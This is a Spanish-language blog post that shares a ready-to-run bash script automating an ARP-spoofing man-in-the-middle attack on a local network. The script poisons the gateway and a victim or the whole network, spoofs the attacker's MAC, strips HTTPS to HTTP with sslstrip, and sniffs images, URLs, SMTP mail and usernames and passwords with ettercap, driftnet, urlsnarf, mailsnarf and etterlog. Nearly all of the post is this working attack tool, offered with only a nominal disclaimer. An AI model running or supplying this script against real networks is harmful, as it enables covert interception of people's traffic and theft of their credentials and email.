Buenas tardes
Hoy os traigo un poderoso script que he creado para GNU/Linux con la intención de demostrar lo vulnerable que puede llegar a ser una red, ya sea por cable o inalámbrica.
El script del que os hablo ataca la vulnerabilidad del protocolo ARP de forma que permite que un atacante se posicione de forma lógica entre la gateway y la victima o victimas interceptando las comunicaciones.
Entrando mas en detalles lo que hacemos es engañar a la gateway diciendole que la dirección MAC de la victima es la nuestra y viceversa, con ello conseguimos que el tráfico de la victima y el router pase por nosotros. Además enrutamos el tráfico entre el router y la victima, ya sea tráfico HTTP o HTTPS, el cual no es descifrado sino que engañaremos a la victima cuando pinche en algún link HTTPS para que la conexión se lleve a cabo en HTTP, esto no funciona si desde un principio se conecta en HTTPS. También mostraremos las imágenes que pasen por nuestra interfaz en tiempo real.
Tiene alguna función mas como capturar mensajes SMTP en tiempo real. Una vez que termina el ataque nos preguntará si queremos abrir Wireshark para analizar lo capturado y saltará el etterlog con los posibles usuarios y contraseñas capturados.
Haremos uso de los siguientes programas que deberán estar instalados en la máquina para que funcione correctamente: xterm, driftnet, dsniff, wireshark (para ver los paquetes capturados, opcional), sslstrip,nmap , etterlog(opcional, muestra las contraseñas capturadas) y ettercap (con el hacemos el ataque al ARP).
La finalidad del programa es tan solo de demostrar la inseguridad que presentan las redes, me eximo de todo mal uso que puedan darle.
Sin mas aquí os dejo el código.
#!/bin/bash
echo "*************************************************"
echo "
EtterCap auto Snffing over HTTP and HTTPS ...
By Ragnar The Viking
"
echo "*************************************************"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "*************************************************"
echo "Interfaz a utilizar :"
echo "*************************************************"
read -e IFACE
echo "*************************************************"
echo "¿Quieres cambiar la MAC?"
echo "MAC actual: $(ifconfig $IFACE | egrep HWaddr | cut -d 'H' -f 2 | cut -d ' ' -f 2)"
read res
echo "*************************************************"
case $res in
Y|s|S|y)mac_gen() {
RANGE=256
i=0
n=$RANDOM
let "n %= $RANGE"
let r=n%2
let n=n+r
n=`printf '%x\n' $n`
mac=`printf $n:`
while [ $i -lt 5 ]; do
n=$RANDOM
let "n %= $RANGE"
n=`printf '%x\n' $n`
if [ $i -lt 4 ]; then
mac=${mac}`printf $n:`
fi
if [ $i = 4 ]; then
mac=${mac}`printf $n`
fi
let i=i+1
done
}
mac_gen
ifconfig $IFACE down
ifconfig $IFACE hw ether $mac
ifconfig $IFACE up
echo "Ahora la MAC es: $(ifconfig $IFACE | egrep HWaddr | cut -d 'H' -f 2 | cut -d ' ' -f 2)"
;;
N|n)
echo "OK, no se cambia";
;;
*)
echo "Escribe Bien"
;;
esac
echo "*************************************************"
echo "¿Quieres hacer un escaneo de la red? : "
echo "*************************************************"
read res
echo "La Ip de la interfaz $IFACE es: $(ifconfig $IFACE | egrep 'inet addr' | cut -d ':' -f 2 | cut -d ' ' -f 1)"
echo "*************************************************"
case $res in
Y|s|S|y)
echo "*************************************************"
echo "Introduce el rango a escanear: "
read rang
echo "*************************************************"
echo "¿Quieres escanear los SO?"
read res
echo "*************************************************"
case $res in
Y|s|S|y)
nmap -O $rang;
;;
N|n)
nmap -sT $rang;
;;
*)
echo "Escribe Bien"
;;
esac
;;
N|n)
echo "OK";
;;
*)
echo "Escribe Bien"
;;
esac
echo "*************************************************"
echo "Parece que tu Gateway es: "
route -n | grep 'UG[ \t]' | awk '{print $2}'
echo "Introduce la Gateway o dejalo en blanco"
read -e ROUTER
echo "*************************************************"
echo "Seleciona la carpeta para las CAP"
read -e SESSION
echo "*************************************************"
echo "IP Victima - Dejar en blanco para envenenar a toda la red: "
read -e VICTIM
echo "*************************************************"
mkdir $SESSION
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
xterm -e "sslstrip -p -k -w $SESSION/sslstrip.log" 2>>$SESSION/errorSslstrip.txt &
echo "############ Now Running Ettercap #################"
echo "############# Mejorado by Ragnar #################"
echo "################################################"
echo ""
echo ""
echo "*************************************************"
echo "¿Quieres activar Driftnet? : "
read res
echo "*************************************************"
case $res in
Y|s|S|y)
mkdir $SESSION/driftnet/;
driftnet -i $IFACE -d $SESSION/driftnet/ -x "ragnar-" &
;;
N|n)
echo "OK";
;;
*)
echo "Escribe Bien"
;;
esac
echo "*************************************************"
echo "¿Quieres activar Urlsnarf? : "
read resp
echo "*************************************************"
case $resp in
Y|s|S|y)
xterm -e "urlsnarf -i $IFACE" &
;;
N|n)
echo "OK";
;;
*)
echo "Escribe Bien"
;;
esac
echo "*************************************************"
echo "¿Quieres abrir Mailsnarf? : "
read resp
echo "*************************************************"
case $resp in
Y|s|S|y)
xterm -e "mailsnarf -i $IFACE -v" &
;;
N|n)
echo "OK";
;;
*)
echo "Escribe Bien"
;;
esac
ettercap -T -q -i $IFACE -w $SESSION/ettercap.pcap -L $SESSION/etter -M arp //$ROUTER/ //$VICTIM/
echo "*************************************************"
echo "Limpiando Iptables..."
echo "*************************************************"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "OKiss"
echo "************************************************"
etterlog -p -i $SESSION/etter.eci
echo "************************************************"
echo " Sniffing done ! "
echo "¿Quieres abrir el archivo de la captura? : "
read resp
echo "*************************************************"
case $resp in
Y|s|S|y)
wireshark $SESSION/ettercap.pcap
;;
N|n)
echo "Hasta la Proxima";
sleep 1;
;;
*)
echo "Escribe Bien"
;;
esac
clear
echo "https://instalandolo.blogspot.com"
################################
Bueno malignos espero que os haya gustado y no dudeís en comentar.

No hay comentarios:
Publicar un comentario